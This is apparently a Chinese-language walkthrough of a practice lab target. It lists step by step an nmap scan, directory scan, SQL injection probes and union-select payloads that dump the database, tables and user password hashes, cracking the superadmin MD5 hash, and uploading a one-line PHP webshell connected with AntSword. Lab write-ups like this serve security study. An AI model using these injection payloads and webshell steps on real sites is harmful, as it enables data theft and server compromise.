1.通过nmap扫描靶场ip

2.目录扫描

3.找出文件存储位置，看看哪里可以上传文件

4.注册账号登录一下

点击search

5.输入1' and 1=1 --+   1' and 1=2 --+看看有无SQL注入

6.判断字段数

1' order by 3 --+

说明字段数是3

7.查看数据库

-1' union select database(),2,3 #

8.查看数据库表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

9.查看user表所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

10.查看数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

11.选择superadmin对应的密码2386acb2cf356944177746fc92523983进行md5解密

12.看到上传文件，然后上传一句话木马

13发现x.php上传上去了

14.进入查看

15用蚁剑连接